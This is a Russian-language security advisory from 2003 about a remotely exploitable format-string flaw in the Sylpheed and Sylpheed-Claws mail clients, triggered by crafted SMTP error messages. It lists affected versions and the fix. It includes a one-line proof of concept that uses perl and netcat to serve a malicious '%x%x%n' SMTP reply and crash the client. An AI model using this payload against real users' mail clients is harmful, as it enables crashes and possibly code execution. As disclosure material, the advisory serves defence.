Удаленное переполнение буфера в Sylpheed и Sylpheed-Claws

Дата публикации:
24.10.2003
Всего просмотров:
950
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Sylpheed 0.x
Sylpheed-Claws 0.x
Уязвимые версии: Sylpheed-claws 0.9.6 - 0.9.4

Описание: Уязвимость обнаружена в Sylpheed и Sylpheed-Claws. Злонамеренный пользователь может скомпрометировать систему пользователя.

Уязвимость связанна с ошибкой форматной строки при обработке сообщений об ошибках от SMTP сервера. Злонамеренный SMTP сервер может возвратить специально обработанное сообщение об ошибке, чтобы выполнить произвольный код на системе пользователя.

Пример/Эксплоит:

Create a test account with smtp server localhost:1234
Then do:
perl -e 'print "535 failed %x%x%n\r\n"' | nc -l -p 1234
Then send a message.
Actual result - sylpheed crashes.

URL производителя: http://sylpheed.good-day.net/

Решение: Обновите программу до Sylpheed 0.9.7 или примените соответствующую заплату: http://sylpheed.good-day.net/

Ссылки: [Full-Disclosure] Sylpheed-claws format string bug, yet still sylpheed much better than windows

или введите имя

CAPTCHA